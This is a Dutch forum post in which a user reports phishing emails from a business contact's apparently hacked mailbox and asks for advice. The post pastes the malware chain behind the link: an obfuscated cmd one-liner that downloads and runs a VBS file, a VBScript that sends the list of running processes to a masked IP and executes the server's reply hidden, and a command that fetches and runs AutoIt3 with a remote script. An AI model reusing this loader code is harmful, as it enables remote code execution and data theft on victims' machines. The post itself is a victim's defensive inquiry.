Hallo allen,
Zowel mijn collega als ik krijgen op onregelmatige tijdstippen met enkele maanden tussen kopies van emails die naar 1 bepaald zakencontact werden gestuurd. Ik vermoed dat diens mailbox is gehacket, alle mails (en dat zijn er verschillende naar dat contact) zijn van of naar hem gericht en de "verzenders" en ontvangers van de verdachte berichten zijn telkens 2 of 3 van de personen die in de oorspronkelijke mail verzender, ontvanger of CC waren.
De mails bevatten telkens bovenaan een melding (in het Nederlands) "consulteer document: verdachte-link.com" of iets gelijkaardigs.
Als ik die link bezoek wordt er een zip bestand gedownloaded met erin iets wat lijkt op een PDF document, maar in werkelijkheid een snelkoppeling is met als target een windows script (knap gedaan, ik wist zelfs niet dat dat kon):
Mijn kennis van powershell is onvoldoende om te zien of er verder nog iets gebeurd in het script.
Als ik de url in oMephHKdKfVY bezoek in de browser wordt er code weergegeven die wellicht moet uitgevoerd worden op mijn systeem na de succesvolle upload:
Autoit3 is blijkbaar een soort script engine.
Ik heb het tenslotte ook nog aangedurfd om de vrjadt.au3 via curl te downloaden (de exe's niet), maar dat is een compleet onleesbaar en zeer lang bestand.
Is dit een zeer gerichte poging of is dit allemaal standaard materiaal voor gehackte mailboxen?
Wat doen we - behalve extra aandacht en alle standaard veiligheidsmaatregelen - best hiermee?
Zowel mijn collega als ik krijgen op onregelmatige tijdstippen met enkele maanden tussen kopies van emails die naar 1 bepaald zakencontact werden gestuurd. Ik vermoed dat diens mailbox is gehacket, alle mails (en dat zijn er verschillende naar dat contact) zijn van of naar hem gericht en de "verzenders" en ontvangers van de verdachte berichten zijn telkens 2 of 3 van de personen die in de oorspronkelijke mail verzender, ontvanger of CC waren.
De mails bevatten telkens bovenaan een melding (in het Nederlands) "consulteer document: verdachte-link.com" of iets gelijkaardigs.
Als ik die link bezoek wordt er een zip bestand gedownloaded met erin iets wat lijkt op een PDF document, maar in werkelijkheid een snelkoppeling is met als target een windows script (knap gedaan, ik wist zelfs niet dat dat kon):
Als ik in powershell het curl script uitvoer (zonder de rest erachter uiteraard!) wordt een vbs bestand gedownload met als inhoud (onzin comments en code gefilterd):%windir%\system32\cmd.exe /c S8 || ECHO S8 & pInG S8 || C"Url" ht"tp:"//XXXX"."XX"X"."XXX"."XXX"/HSG/"F" -o %tmp%\S8.vbs & pInG -n 3 S8 || cS"c"R"I"pt %tMP%\S8.vbs & e"XiT" 'NfO=HADTSAG=KMR
Blijkbaar tracht men alle processen in kaart te krijgen en te uploaden naar een webserver.gxGkhlCXAU = "cmd"
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
dim all_process
if gxGkhlCXAU = "a" then
MsgBox "plethodonPaleogenesis"
end if
Set colProcesses = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objProcess in colProcesses
all_process = all_process & objProcess.Name
Next
SwAzlxyvdImp = "Shell.Application"
oMephHKdKfVY="http://XXX.XXX.XXX.XXX:XXXX/vjikfjxb"
EPhLeifpN="WINHTTP.WinHTTPRequest.5.1"
With CreateObject(EPhLeifpN)
.Open "post", oMephHKdKfVY, False
.setRequestHeader "a", all_process
.send
fnPvczoPwClvt = .responseText
CreateObject(SwAzlxyvdImp).ShellExecute gxGkhlCXAU, fnPvczoPwClvt ,"","",0 ''
End With
Mijn kennis van powershell is onvoldoende om te zien of er verder nog iets gebeurd in het script.
Als ik de url in oMephHKdKfVY bezoek in de browser wordt er code weergegeven die wellicht moet uitgevoerd worden op mijn systeem na de succesvolle upload:
De url is dezelfde als die hierboven in oMephHKdKfVY/c mkdir c:\vjik & cd /d c:\vjik & copy c:\windows\system32\curl.exe vjik.exe & vjik -H "User-Agent: curl" -o Autoit3.exe http://XXX.XXX.XXX.XXX:XXXX & vjik -o vrjadt.au3 http://XXX.XXX.XXX.XXX:XXXX/msivjikfjxb & Autoit3.exe vrjadt.au3
Autoit3 is blijkbaar een soort script engine.
Ik heb het tenslotte ook nog aangedurfd om de vrjadt.au3 via curl te downloaden (de exe's niet), maar dat is een compleet onleesbaar en zeer lang bestand.
Is dit een zeer gerichte poging of is dit allemaal standaard materiaal voor gehackte mailboxen?
Wat doen we - behalve extra aandacht en alle standaard veiligheidsmaatregelen - best hiermee?
:strip_icc():strip_exif()/u/37855/icoon.jpg?f=community)
/u/28468/librarian2.png?f=community)
/u/1568000/crop6111972429a47_cropped.png?f=community)